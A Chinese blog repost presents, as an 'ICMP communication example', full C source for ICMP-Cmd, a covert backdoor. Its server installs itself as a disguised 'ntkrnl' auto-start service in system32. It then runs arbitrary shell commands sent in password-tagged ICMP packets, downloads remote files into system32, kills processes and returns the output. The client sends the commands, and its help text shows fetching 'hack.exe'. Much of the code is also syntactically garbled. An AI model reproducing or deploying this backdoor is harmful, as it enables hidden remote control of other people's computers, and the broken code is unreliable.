ICMP 通讯例子

最新推荐文章于 2023-03-09 10:41:38 发布
转载 最新推荐文章于 2023-03-09 10:41:38 发布 · 1.4k 阅读 · 0
文章标签:

#通讯 #service #buffer #null #socket #struct

本文提供了一个使用ICMP协议进行远程通信的示例代码,包括服务器端和服务安装卸载功能,客户端能够发送命令并接收反馈,支持列出进程、终止进程等功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

      代码从网上所得,是一个通过ICMP 协议通讯的例子。 服务器端,注册成为服务,所支持的功能有限,只有list process,以及 stop process ,以及卸载服务器的段所注册的服务。 (可以从代码中看到原作者)

    服务器端代码如下: 

#include <winsock2.h>
#include <stdio.h>
#include <urlmon.h> 
#include <tlhelp32.h>
//#include "stdafx.h"

#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")

#define ICMP_PASSWORD 1234                                             
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))


/* The IP header */
typedef struct iphdr {
 unsigned int h_len:4//4位首部长度
 unsigned int version:4//IP版本号,4表示IPV4
 unsigned char tos; //8位服务类型TOS
 unsigned short total_len; //16位总长度(字节)
 unsigned short ident; //16位标识
 unsigned short frag_and_flags; //3位标志位
 unsigned char ttl; //8位生存时间 TTL
 unsigned char proto; //8位协议 (TCP, UDP 或其他)
 unsigned short checksum; //16位IP首部校验和
 unsigned int sourceIP; //32位源IP地址
 unsigned int destIP; //32位目的IP地址
}IpHeader;


//定义ICMP首部
typedef struct _ihdr 
{
 BYTE i_type; //8位类型
 BYTE i_code; //8位代码
 USHORT i_cksum; //16位校验和 
 USHORT i_id; //识别号(一般用进程号作为识别号)
 USHORT i_seq; //报文序列号 
 ULONG timestamp; //时间戳
}IcmpHeader;

char arg[256];
char buffer[2048= {0};//管道输出的数据
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void fill_icmp_data(char * icmp_data);
void pslist(void);
BOOL killps(DWORD id);//杀进程函数
void send(void);
char *ICMP_DEST_IP;
USHORT checksum(USHORT *buffer, int size);

 

HANDLE                hMutex;
SERVICE_STATUS        ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;

void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *);
void  WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
void  InstallCmdService(void);
void  RemoveCmdService(void);
void  usage(char *par);

int main(int argc,char *argv[])
{
#if 0
 SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};

 if(argc==2)
 {
  if(!stricmp(argv[1],"-install"))
  {
   usage(argv[0]);
   InstallCmdService();
  }
  else if(!stricmp(argv[1],"-remove"))
  {
   usage(argv[0]);
   RemoveCmdService();
  }
  else usage(argv[0]);
  return 0;
 }
 else usage(argv[0]);

 


 StartServiceCtrlDispatcher(DispatchTable);
#endif
 CmdService(0);
 return 0;
}

void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
 HANDLE    hThread;

 ServiceStatus.dwServiceType             = SERVICE_WIN32;
 ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
 ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
 ServiceStatus.dwServiceSpecificExitCode = 0;
 ServiceStatus.dwWin32ExitCode           = 0;
 ServiceStatus.dwCheckPoint              = 0;
 ServiceStatus.dwWaitHint                = 0;

 ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
 if(ServiceStatusHandle==0)
 {
  OutputDebugString("RegisterServiceCtrlHandler Error ! ");
  return ;
 }

 ServiceStatus.dwCurrentState = SERVICE_RUNNING;
 ServiceStatus.dwCheckPoint   = 0;
 ServiceStatus.dwWaitHint     = 0;

 if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
 {
  OutputDebugString("SetServiceStatus in CmdStart Error ! ");
  return ;
 }

 hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
 if(hThread==NULL)
 {
  OutputDebugString("CreateThread in CmdStart Error ! ");
 }

 return ;
}

void WINAPI CmdControl(DWORD dwCode)
{
 switch(dwCode)
 {
 case SERVICE_CONTROL_PAUSE:
  ServiceStatus.dwCurrentState = SERVICE_PAUSED;
  break;

 case SERVICE_CONTROL_CONTINUE:
  ServiceStatus.dwCurrentState = SERVICE_RUNNING;
  break;

 case SERVICE_CONTROL_STOP:      
  WaitForSingleObject(hMutex,INFINITE);

  ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
  ServiceStatus.dwWin32ExitCode = 0;
  ServiceStatus.dwCheckPoint    = 0;
  ServiceStatus.dwWaitHint      = 0;
  if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
  {
   OutputDebugString("SetServiceStatus in CmdControl in Switch Error ! ");
  }

  ReleaseMutex(hMutex);
  CloseHandle(hMutex);
  return ;

 case SERVICE_CONTROL_INTERROGATE:
  break;

 default:
  break;
 }

 if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
 {
  OutputDebugString("SetServiceStatus in CmdControl out Switch Error ! ");
 }

 return ;
}

DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务
{   
 char *icmp_data;
 int bread,datasize,retval;
 SOCKET sockRaw = (SOCKET)NULL;
 WSADATA wsaData;
 struct sockaddr_in dest,from;
 int fromlen = sizeof(from);
 int timeout = 2000;
 char *recvbuf;

 

 if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
 {
  printf("WSAStartup failed: %s ",retval);
  ExitProcess(STATUS_FAILED);
 }

 sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
 if (sockRaw == INVALID_SOCKET)
 {
  printf("WSASocket() failed: %s ",WSAGetLastError());
  ExitProcess(STATUS_FAILED);
 }
 __try{
  bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));

  if(bread == SOCKET_ERROR) __leave;


  memset(&dest,0,sizeof(dest));
  dest.sin_family = AF_INET;
  datasize=0;
  datasize += sizeof(IcmpHeader); 
  icmp_data =(char*)xmalloc(MAX_PACKET);
  recvbuf = (char*)xmalloc(MAX_PACKET);
  if (!icmp_data) {
   //fprintf(stderr,"HeapAlloc failed %d ",GetLastError());
   __leave;
  }
  memset(icmp_data,0,MAX_PACKET);
  for(;;) {

   int bwrote;
   bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));

   bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
   if (bread == SOCKET_ERROR)
   {
    if (WSAGetLastError() == WSAETIMEDOUT)continue;

    __leave;

   }
   decode_resp(recvbuf,bread,&from);
   Sleep(200);
   memset(recvbuf,0,sizeof(recvbuf));
  }
 }
 __finally {
  if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
  WSACleanup();
 }
 return 0;
}

 


void InstallCmdService(void)
{
 SC_HANDLE        schSCManager;
 SC_HANDLE        schService;
 char             lpCurrentPath[MAX_PATH];
 char             lpImagePath[MAX_PATH];
 char             *lpHostName;
 WIN32_FIND_DATA  FileData;
 HANDLE           hSearch;
 DWORD            dwErrorCode;
 SERVICE_STATUS   InstallServiceStatus;


 GetSystemDirectory(lpImagePath,MAX_PATH);
 strcat(lpImagePath,"/ntkrnl.exe");
 lpHostName=NULL;

 printf("Transmitting File ... ");
 hSearch=FindFirstFile(lpImagePath,&FileData);
 if(hSearch==INVALID_HANDLE_VALUE)
 {
  GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
  if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0
  {
   dwErrorCode=GetLastError();
   if(dwErrorCode==5)
   {
    printf("Failure ... Access is Denied ! ");         
   }
   else
   {
    printf("Failure ! ");
   }
   return ;
  }
  else
  {
   printf("Success ! ");
  }
 }
 else
 {
  printf("already Exists ! ");
  FindClose(hSearch);
 }

 schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
 if(schSCManager==NULL)
 {
  printf("Open Service Control Manager Database Failure ! ");
  return ;
 }

 printf("Creating Service .... ");
 schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
  SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
  SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); 
 if(schService==NULL)
 {
  dwErrorCode=GetLastError();
  if(dwErrorCode!=ERROR_SERVICE_EXISTS)
  {
   printf("Failure ! ");
   CloseServiceHandle(schSCManager);
   return ;
  }
  else
  {
   printf("already Exists ! ");
   schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
   if(schService==NULL)
   {
    printf("Opening Service .... Failure ! ");
    CloseServiceHandle(schSCManager);
    return ;
   }
  }
 }
 else
 {
  printf("Success ! ");
 }

 printf("Starting Service .... ");
 if(StartService(schService,0,NULL)==0)                         
 {
  dwErrorCode=GetLastError();
  if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
  {
   printf("already Running ! ");
   CloseServiceHandle(schSCManager);  
   CloseServiceHandle(schService);
   return ;
  }
 }
 else
 {
  printf("Pending ... ");
 }

 while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)           
 {
  if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
  {
   Sleep(100);
  }
  else
  {
   break;
  }
 }
 if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
 {
  printf("Failure ! ");                       
 }
 else
 {
  printf("Success ! ");
 }

 CloseServiceHandle(schSCManager);
 CloseServiceHandle(schService);
 return ;
}

void RemoveCmdService(void
{
 SC_HANDLE        schSCManager;
 SC_HANDLE        schService;
 char             lpImagePath[MAX_PATH];
 char             *lpHostName;
 WIN32_FIND_DATA  FileData;
 SERVICE_STATUS   RemoveServiceStatus;
 HANDLE           hSearch;
 DWORD            dwErrorCode;


 GetSystemDirectory(lpImagePath,MAX_PATH);
 strcat(lpImagePath,"/ntkrnl.exe");
 lpHostName=NULL;


 schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
 if(schSCManager==NULL)
 {
  printf("Opening SCM ......... ");
  dwErrorCode=GetLastError();
  if(dwErrorCode!=5)
  {
   printf("Failure ! "); 
  }
  else
  {
   printf("Failuer ... Access is Denied ! ");
  }
  return ;
 }

 schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
 if(schService==NULL) 
 {
  printf("Opening Service ..... ");
  dwErrorCode=GetLastError();
  if(dwErrorCode==1060)
  {
   printf("no Exists ! ");
  }
  else
  {
   printf("Failure ! ");
  }
  CloseServiceHandle(schSCManager);
 }
 else
 {
  printf("Stopping Service .... ");
  if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
  {
   if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
   {
    printf("already Stopped ! "); 
   }
   else
   {
    printf("Pending ... ");
    if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
    {
     while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         
     {
      Sleep(10);
      QueryServiceStatus(schService,&RemoveServiceStatus);
     }
     if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
     {
      printf("Success ! ");
     }
     else
     {
      printf("Failure ! ");
     }
    }
    else
    {
     printf("Failure ! ");          
    }
   }
  }
  else
  {
   printf("Query Failure ! ");
  }

  printf("Removing Service .... ");     
  if(DeleteService(schService)==0)
  {
   printf("Failure ! ");   
  }
  else
  {
   printf("Success ! ");
  }
 }

 CloseServiceHandle(schSCManager);        
 CloseServiceHandle(schService);

 printf("Removing File ....... ");
 Sleep(1500);
 hSearch=FindFirstFile(lpImagePath,&FileData);
 if(hSearch==INVALID_HANDLE_VALUE)
 {
  printf("no Exists ! ");
 }
 else
 {
  if(DeleteFile(lpImagePath)==0)
  {
   printf("Failure ! ");               
  }
  else
  {
   printf("Success ! ");
  }
  FindClose(hSearch);
 }

 return ;
}

void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
{


 IpHeader *iphdr;
 IcmpHeader *icmphdr;
 unsigned short iphdrlen;
 iphdr = (IpHeader *)buf;
 iphdrlen = iphdr->h_len * 4 ; 
 icmphdr = (IcmpHeader*)(buf + iphdrlen);
 if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段
 {

  ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址

  memcpy(arg,buf+iphdrlen+12,256);
  if (!memcmp(arg,"pskill",6))
  {
   killps(atoi(strstr(arg," ")));
   memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
   send();
  }

 

  else if (!memcmp(arg,"pslist",6)){pslist();send();}
  else if (!strcmp(arg,"remove "))
  {
   RemoveCmdService();
   memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
   send();
   return;
  }
  ////////////************    http下载   *************
  else if (!memcmp(arg,"http://",7))   
  {
   if(char *FileName=strstr(arg,"-"))
   {

    char url[200];//保存网址的数组
    memset(url,0,200);
    memcpy(url,arg,int(FileName-arg-1));
    char fname[MAX_PATH];
    GetSystemDirectory(fname,MAX_PATH);
    FileName++;
    strcat(fname,"/");
    strcat(fname,FileName);
    *strstr(fname," ")=NULL;
    HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
    memset(buffer,0,sizeof(buffer));
    if(hRet==S_OK) memcpy(buffer,"Download OK! ",sizeof("Download OK "));
    else 
     memcpy(buffer,"Download Failure! ",sizeof("Download Failure! "));
    send();
    return;
   }
  }
  //*******************************************
  else{

   SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
   HANDLE hRead,hWrite;
   sa.nLength = sizeof(SECURITY_ATTRIBUTES);
   sa.lpSecurityDescriptor = NULL;
   sa.bInheritHandle = TRUE;
   if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
   {
    printf("Error On CreatePipe()");
    return;
   } 


   STARTUPINFO si;
   PROCESS_INFORMATION pi; 
   si.cb = sizeof(STARTUPINFO);
   GetStartupInfo(&si); 
   si.hStdError = hWrite;
   si.hStdOutput = hWrite;
   si.wShowWindow = SW_HIDE;
   si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

   char cmdline[270];
   GetSystemDirectory(cmdline,MAX_PATH+1);

   strcat(cmdline,"/cmd.exe /c");

   strcat(cmdline,arg);
   if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 
   {
    printf("Error on CreateProcess()");
    return;
   }
   CloseHandle(hWrite);


   DWORD bytesRead; 

   for(;;){
    if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;
    Sleep(200);
   }
   //printf("%s",buffer);
   /////////////////////////////////////////////
   //发送输出数据

   send();

  }
  ////////////////////////////////////////////////


 }
 //else printf("Other ICMP Packets! ");
 //printf(endl; 
}

 


USHORT checksum(USHORT *buffer, int size) 
{
 unsigned long cksum=0;
 while(size >1
 {
  cksum+=*buffer++;
  size -=sizeof(USHORT);
 }
 if(size ) {
  cksum += *(UCHAR*)buffer;
 }
 cksum = (cksum >> 16+ (cksum & 0xffff);
 cksum += (cksum >>16);
 return (USHORT)(~cksum);
}


void fill_icmp_data(char * icmp_data)
{

 IcmpHeader *icmp_hdr;
 char *datapart;
 icmp_hdr = (IcmpHeader*)icmp_data;
 icmp_hdr->i_type = 0;
 icmp_hdr->i_code = 0;
 icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
 icmp_hdr->i_cksum = 0;
 icmp_hdr->i_seq =4321;
 icmp_hdr->timestamp = GetTickCount(); //设置时间戳
 datapart = icmp_data + sizeof(IcmpHeader);
 memcpy(datapart,buffer,strlen(buffer));
 //for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; 
}

void  usage(char *par)
{

 printf(" =====Welcome to www.hackerxfiles.net====== ");
 printf(" ");
 printf(" ---[ ICMP-Cmd v1.0 beta, by gxisone   ]--- ");
 printf(" ---[ E-mail: gxisone@hotmail.com      ]--- ");
 printf(" ---[                        2003/8/15 ]--- ");
 printf(" ");
 printf(" Usage: %s -install (to install service) ",par);
 printf("        %s -remove (to remove service) ",par);
 printf(" ");

 return ;


}

void send(void)
{

 WSADATA wsaData;
 SOCKET sockRaw = (SOCKET)NULL;
 struct sockaddr_in dest;
 int bread,datasize,retval,bwrote;
 int timeout = 1000;
 char *icmp_data;

 if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
 if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
  ==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
 __try
 {
  if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
  //设置发送超时
  memset(&dest,0,sizeof(dest));
  dest.sin_family = AF_INET;
  dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
  datasize=strlen(buffer);
  datasize+=sizeof(IcmpHeader); 
  icmp_data=(char*)xmalloc(MAX_PACKET);

  if(!icmp_data) __leave;
  memset(icmp_data,0,MAX_PACKET);

  fill_icmp_data(icmp_data); //填充ICMP报文
  ((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
  bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文

  if (bwrote == SOCKET_ERROR)
  {
   //if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out ");
   //printf("sendto failed:"<<WSAGetLastError()<<endl;
   __leave;
  }

  //printf("Send Packet to %s Success! "<<ICMP_DEST_IP<<endl;
 }


 __finally 
 {
  if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
  WSACleanup();
 }
 memset(buffer,0,sizeof(buffer));
 Sleep(200);

}

void pslist(void)
{
 HANDLE hProcessSnap = NULL;
 PROCESSENTRY32 pe32= {0};
 hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if (hProcessSnap == (HANDLE)-1)
 {
  printf(" CreateToolhelp32Snapshot() failed:%d",GetLastError());
  return ;
 }
 pe32.dwSize = sizeof(PROCESSENTRY32);
 printf(" ProcessName     ProcessID");
 if (Process32First(hProcessSnap, &pe32))
 {
  char a[5];

  do
  {
   strcat(buffer,pe32.szExeFile);
   strcat(buffer," ");
   itoa(pe32.th32ProcessID,a,10);
   strcat(buffer,a);
   strcat(buffer," ");
   //printf(" %-20s%d",pe32.szExeFile,pe32.th32ProcessID);
  }
  while (Process32Next(hProcessSnap, &pe32));

 }
 else
 {
  printf(" Process32Firstt() failed:%d",GetLastError());
 }
 CloseHandle (hProcessSnap);
 return;
}

BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
{
 TOKEN_PRIVILEGES tp;
 LUID luid;

 if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
 {
  printf(" LookupPrivilegeValue error:%d", GetLastError() ); 
  return FALSE; 
 }
 tp.PrivilegeCount = 1;
 tp.Privileges[0].Luid = luid;
 if (bEnablePrivilege)
  tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 else
  tp.Privileges[0].Attributes = 0;
 // Enable the privilege or disable all privileges.
 AdjustTokenPrivileges(
  hToken, 
  FALSE, 
  &tp, 
  sizeof(TOKEN_PRIVILEGES), 
  (PTOKEN_PRIVILEGES) NULL, 
  (PDWORD) NULL); 
 // Call GetLastError to determine whether the function succeeded.
 if (GetLastError() != ERROR_SUCCESS) 
 { 
  printf("AdjustTokenPrivileges failed: %u ", GetLastError() ); 
  return FALSE; 
 } 
 return TRUE;
}
////////////////////////////////////////////////////////////////////////////
BOOL killps(DWORD id)//杀进程函数
{
 HANDLE hProcess=NULL,hProcessToken=NULL;
 BOOL IsKilled=FALSE,bRet=FALSE;
 __try
 {

  if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
  {
   printf(" Open Current Process Token failed:%d",GetLastError());
   __leave;
  }
  //printf(" Open Current Process Token ok!");
  if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
  {
   __leave;
  }
  printf(" SetPrivilege ok!");

  if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
  {
   printf(" Open Process %d failed:%d",id,GetLastError());
   __leave;
  }
  //printf(" Open Process %d ok!",id);
  if(!TerminateProcess(hProcess,1))
  {
   printf(" TerminateProcess failed:%d",GetLastError());
   __leave;
  }
  IsKilled=TRUE;
 }
 __finally
 {
  if(hProcessToken!=NULL) CloseHandle(hProcessToken);
  if(hProcess!=NULL) CloseHandle(hProcess);
 }
 return(IsKilled);
}

 

   上面代码是服务器端,client 段的代码很简单:

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h> 

#pragma comment(lib,"ws2_32.lib")

char SendMsg[256];

/* The IP header */
typedef struct iphdr {
unsigned int h_len:4//4位首部长度
unsigned int version:4//IP版本号,4表示IPV4
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IpHeader;

 


typedef struct _ihdr
{
BYTE i_type;//8位类型
BYTE i_code; //8位代码
USHORT i_cksum;//16位校验和
USHORT i_id;//识别号(一般用进程号作为识别号)
USHORT i_seq;//报文序列号
ULONG timestamp;//时间截
} IcmpHeader;

#define STATUS_FAILED 0xFFFF
  
#define MAX_PACKET 2000
char arg[1450];

#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))


void fill_icmp_data(char *int);
USHORT checksum(USHORT *int);

void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void help(void);
void usage(char * prog);

int main(int argc, char *argv[])
{
char *ICMP_DEST_IP; //目标主机的IP
char *recvbuf;

if(argc!=2)
 {
  usage(argv[0]);
  return 0;
 }

ICMP_DEST_IP=argv[1];//取得目标主机IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen=sizeof(from);

char *icmp_data;

 


if(WSAStartup(MAKEWORD(22), &wsaData) != 0)
{
fprintf(stderr, "WSAStartup failed: %d ", GetLastError());
ExitProcess(STATUS_FAILED);
}
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *&timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *&timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;

usage(argv[0]);
__try{
for(;;){

printf("ICMP-CMD>");
fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中

if(!strcmp(SendMsg,"Q ")||!strcmp(SendMsg,"q "))ExitProcess(0);
if(!strcmp(SendMsg," "))continue;
if(!strcmp(SendMsg,"H ")||!strcmp(SendMsg,"h ")){help();continue;}
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf(" FileName Error. Use "-FileName" ");continue;}

datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader *)icmp_data)->i_cksum=0;
((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);

int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *&dest, sizeof(dest));

if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out ");
fprintf(stderr,"sendto failed: %d ",WSAGetLastError());

}

  if (bwrote<datasize ) {//没有把所有的数据发送出去,也出错了。

         return 0;

       }

printf(" Send Packet to %s Success! ",argv[1]);

DWORD start = GetTickCount();
for(;;){

if((GetTickCount() - start) >= 1000break;
memset(recvbuf,0,MAX_PACKET);
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *&from, &fromlen);
if(bread == SOCKET_ERROR)
{
if(WSAGetLastError() == WSAETIMEDOUT)
{
printf("timed out ");
break;
}

fprintf(stderr, "recvfrom failed: %d ", WSAGetLastError());
break;
}

decode_resp(recvbuf, bread, &from);
}
}//end for

}//end try

 


__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}

return 0;
}


USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;

while(size > 1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}

if(size)
{
cksum+=*(UCHAR *)buffer;
}

cksum=(cksum >> 16+ (cksum & 0xffff);
cksum+=(cksum >> 16);
return(USHORT) (~cksum);
}
void fill_icmp_data(char *icmp_data, int datasize)
{
IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr= (IcmpHeader *)icmp_data;
icmp_hdr->i_type=0;
icmp_hdr->i_code=0;
icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
icmp_hdr->timestamp =GetTickCount();
icmp_hdr->i_seq=1234;
datapart=icmp_data + sizeof(IcmpHeader);
memcpy(datapart,SendMsg,sizeof(SendMsg));



void usage(char * prog)
{
 printf(" =====Welcome to www.hackerxfiles.net====== ");
 printf(" ");
    printf(" ---[ ICMP-Cmd v1.0 beta, by gxisone   ]--- ");
 printf(" ---[ E-mail:    gxisone@hotmail.com   ]--- ");
 printf(" ---[                      2003/8/15   ]--- ");
 printf(" usage: %s RemoteIP ",prog);
 printf(" Ctrl+C or Q/q to Quite        H/h for help ");
}

 


void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
{
memset(arg,0,sizeof(arg));
IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ; 
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==4321)//密码正确则输出数据段
{
printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
printf(" IcmpType %d",icmphdr->i_type);
printf(" IcmpCode %d",icmphdr->i_code);
printf(" ");
memcpy(arg,buf+iphdrlen+12,1450);
printf("%s",arg);
}

else printf("Other ICMP Packets! ");

}

void help(void)
{
 printf(" ");
 printf("[http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is //system32) ");
 printf("[pslist]        (List the Process) ");
 printf("[pskill ID]     (Kill the Process) ");
 printf("Command         (run the command) "); 
 printf(" ");
}
free2o
关注
udpSocket捕获ICMP不可达错误
依然的专栏
09-30 5191
最近得写个udpAgent,由于要做udpServer端的容灾,所以要感知udpAgent发出的UDP包是否被某个udpServer接收。但是UDP协议本身是无状态的,也就是说默认情况下,udpAgent进程是无法感知其发出的UDP包是否被接收了的。     但是,从TCP/IP协议栈来说,如果一个UDP包没有到达目的地址,发送端会收到一个“目的地址不可达”的ICMP报文。所以现在的问题就只剩下
速读原著-TCP/IP(ICMP端口不可达差错)
逍遥云恋
03-01 2524
6.5 ICMP端口不可达差错 最后两小节我们来讨论 I C M P查询报文—地址掩码和时间戳查询及应答。现在来分析一种I C M P差错报文,即端口不可达报文,它是 I C M P目的不可到达报文中的一种,以此来看一看I C M P差错报文中所附加的信息。使用 U D P(见第11章)来查看它。 U D P的规则之一是,如果收到一份 U D P数据报而目的端口与某个正在使用的进程不相符,那么U ...
Icmp高级开发
02-11
非常优秀的Icmp高级开发例子
4.4.2 ICMP的应用举例
engineer0的博客
04-16 949
分组网间探测 ping 用于测试两台主机的连通性 使用 ICMP 回送请求与回送回答报文 是应用层直接使用网络层ICMP的一个例子,没用通过 TCP 或 UDP 有的主机为了防止恶意攻击可能会设定不回复外界发送过来的ICMP请求恢复报文 tracert命令 用来跟踪一个分组从源点到终点的路径 该指令会从源主机向目的主机发送一连串的ip数据报,数据报中封装的是无法交付的UDP用户数据报 1、第一个数据报P1的生存时间TTL设置为1,当P1到达路径上的第一个路由器R1时,路由器R1先接收它,接着把TTL的值.
实例3、研究 ICMP 数据包
weixin_33724659的博客
05-20 741
拓扑图如下: 文件: pka.rar 大小: 34KB 下载: 下载 学习目标了解 ICMP 数据包的格式 使用 Packet Tracer 捕获并研究 ICMP 报文 简介:Wireshark 可以捕获和显示通过网络接口进出其所在 PC 的所有网络通信。Packet Trace...
Linux下ICMP洪水***实例
weixin_33733810的博客
04-03 175
Linux下ICMP洪水***实例原文链接:http://blog.chinaunix.net/uid-25324849-id-215075.html注:所以文章红色字体代表需要特别注意和有问题还未解决的地方,蓝色字体表示需要注意的地方1.本文所介绍的程序平台虚拟机为:Red Hat Enterprise Linux 52.洪水***简介洪水***指的是利用计算机网络技术向目...
ICMP
姜希成的博客
12-22 2万+
